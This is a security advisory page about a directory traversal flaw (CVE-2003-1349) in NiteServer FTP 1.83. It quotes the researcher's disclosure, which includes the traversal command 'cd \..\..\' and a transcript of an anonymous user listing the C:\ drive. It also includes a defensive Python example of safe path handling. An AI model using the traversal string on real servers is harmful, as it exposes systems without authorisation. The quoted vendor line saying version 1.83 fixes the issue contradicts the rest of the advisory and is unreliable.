SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   NiteServer
Vendors:   Krebs, Thomas
NiteServer FTP Server Input Validation Bug Discloses Directories on the System to Remote Users
SecurityTracker Alert ID:  1005923
SecurityTracker URL:  http://securitytracker.com/id/1005923
CVE Reference:   CVE-2003-1349
Updated:  Jun 14 2008
Original Entry Date:  Jan 15 2003
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes
Exploit Included:  Yes
Version(s): 1.83
Description:   An input validation vulnerability was reported in the NiteServer FTP server. A remote authenticated user, including an anonymous user, can view arbitrary directories on the system.

Dennis Rand reported that NiteServer does not filter '\..' character strings from user-supplied commands. A remote authenticated user can view directory listings for directories on the system located outside of the FTP document directory.

A demonstration exploit command is provided:

cd \..\..\

A demonstration exploit transcript is provided in the Source Message.

[Editor's note: The report does not indicate that the remote authenticated user can view arbitrary files.]
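The defect described above is a CWD handler that recognises only one path separator while the underlying Windows file APIs accept both. The following is an added illustration of how a server can confine CWD handling so that '/' and '\' are normalised alike, a climb above the FTP root is refused rather than silently clamped, and the real filesystem path is never echoed to the client. It is not NiteServer's code; the root directory is taken from the transcript, every other value is constructed.

```python
import ntpath

# Constructed example values: the root mirrors the working directory shown in
# the advisory's transcript; nothing here is taken from the server's own code.
FTP_ROOT = r"c:\ftpd\data"
BAD_CHARS = set(':*?"<>|')      # no legitimate directory segment contains these


class TraversalAttempt(ValueError):
    """The client tried to leave the FTP root or sent a malformed segment."""


def resolve_cwd(virtual_cwd, arg, root=FTP_ROOT):
    """Resolve a CWD argument against the client-visible directory.

    Returns (new_virtual_cwd, real_windows_path). Both '/' and '\\' are treated
    as separators: Windows accepts either, so a server that only recognises '/'
    lets '\\..\\..\\' straight through to the filesystem.
    """
    # 1. Separator-agnostic split. A leading separator means "the FTP root",
    #    never the drive root.
    text = arg.replace("\\", "/")
    segments = [] if text.startswith("/") else [s for s in virtual_cwd.split("/") if s]
    for seg in text.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:            # already at the FTP root: refuse, don't clamp
                raise TraversalAttempt(arg)
            segments.pop()
        elif BAD_CHARS & set(seg) or seg.rstrip(". ") != seg:
            # 'd:' would re-anchor ntpath.join on another drive; trailing dots or
            # spaces are silently dropped by Windows and alias another name.
            raise TraversalAttempt(arg)
        else:
            segments.append(seg)
    # 2. Map onto the real root and re-check containment as defence in depth.
    real = ntpath.normpath(ntpath.join(root, *segments))
    root_n = ntpath.normcase(ntpath.normpath(root))
    real_n = ntpath.normcase(real)
    if real_n != root_n and not real_n.startswith(root_n + "\\"):
        raise TraversalAttempt(arg)
    return "/" + "/".join(segments), real


def handle_cwd(virtual_cwd, arg, root=FTP_ROOT):
    """Build the FTP reply for CWD. The reply shows only the virtual path, not
    the real one the transcript's server leaked; refusals get a 550 the
    operator can alert on."""
    try:
        new_virtual, _real = resolve_cwd(virtual_cwd, arg, root)
    except TraversalAttempt:
        return virtual_cwd, "550 Permission denied."
    return new_virtual, f'250 Directory changed to "{new_virtual}".'
```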

Impact:   A remote authenticated user (including anonymous users, if permitted) can view the directory structure and directory listings on the system.
Solution:   According to the report, version 1.85 is not vulnerable.

The latest version is available at:

http://home.knuut.de/Turtie/
http://home.knuut.de/Turtie/niteserver.zip

Vendor URL:  home.knuut.de/Turtie/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


Source Message Contents

Subject:  [VulnWatch] Directory traversal vulnerabilities found in NITE ftp-server version 1.83


Directory traversal vulnerabilities found in NITE ftp-server version 1.83

Discovered by Dennis Rand
www.Infowarfare.dk
------------------------------------------------------------------------


SUMMARY

The NiteServer is a simple FTP-Server program with some special features.
It is free and easy to use.
The following commands are recognized:
USER PORT RETR REST
PASS STOR CWD DELE
HELP LIST
so it should work with any usual ftp-client.
Special Download-Ratio features are implemented.
User-logins are logged with their IP-Number, so the Up/Download-Ratio
will be held for the future. Spy users, watch what they are up- or downloading.
Are you interested in learning Visual Basic Internet programming?
Do you need some different features?
You can purchase the source-code (VB 6.0) from the Author.
Simply send a check about 25 US-$ to

A directory traversal vulnerability in the product allows remote attackers to
cause the server to traverse into directories that reside outside the bounding
FTP root directory.

DETAILS

Vulnerable systems:
 Windows NT 4.0 and Windows 2000 server fully patched
 *  Niteserver Version:1.83 - Author:Thomas Krebs
 
Immune systems:
 * NiteServer version 1.85

NiteServer's failure to filter out "\.." sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure, making it possible to discover the directory
structure outside the configured areas.


The following transcript demonstrates a sample exploitation of the vulnerabilities:

Connected to 192.168.1.22.
220-  Niteserver Version:1.83
220-  Author:Thomas Krebs
220-  email: turtie@knuut.de
220- Welcome to the  Niteserver
220- First Author:Thomas Krebs!
220-
220
User (192.168.1.22:(none)): anonymous
331 User anonymous accepted, send password.....
Password:
230 User anonymous accepted, ok come on.....
ftp> ls
200 PORT command ok....
257 "c:/ftpd/data" is working directory...c:\ftpd\data
ftp> cd /
250 Directory changed to"c:\ftpd\data" .
ftp> cd ..
250 Directory changed to"c:\ftpd\data" .
ftp> cd \..\..\
250 Directory changed to"c:\" .
ftp> ls
200 PORT command ok....
257 "c:/" is working directory...c:\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 12:25 I386
drwxr-xr-x  1 User     Group              0 Dec 23 22:22 Inetpub
drwxr-xr-x  1 User     Group              0 Dec 23 21:49 Installationsfiler til Windows Update
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 IO.SYS
-rwxr-xr-x  1 User     Group              0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x  1 User     Group              0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x  1 User     Group          26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x  1 User     Group         156496 Dec 23 22:30 ntldr
drwxr-xr-x  1 User     Group              0 Dec 23 12:36 OptionPack
-rwxr-xr-x  1 User     Group      134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x  1 User     Group              0 Dec 30 15:19 Program Files
drwxr-xr-x  1 User     Group              0 Dec 23 12:24 RECYCLER
drwxr-xr-x  1 User     Group              0 Dec 24 00:08 TEMP
drwxr-xr-x  1 User     Group              0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> bye
221 Goodbye.

Detection:
Niteserver Version:1.83 is vulnerable to the above-described attacks. 
Earlier versions may be susceptible as well. To determine if a specific 
implementation is vulnerable, experiment by following the above 
transcript. 

Vendor response:
Niteserver Version:1.83 fixes this issue. The latest version is
available from come.to/niteserversite


Disclosure timeline:
12/12/2002 Found the Vulnerability.
12/12/2002 Author notified (turtie@knuut.de)
01/13/2003 No Responses received from turtie@knuut.de
01/13/2003 Public Disclosure.


ADDITIONAL INFORMATION
The vulnerability was discovered by Dennis Rand <matrix@infowarfare.dk>

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages.





Copyright 2019, SecurityGlobal.net LLC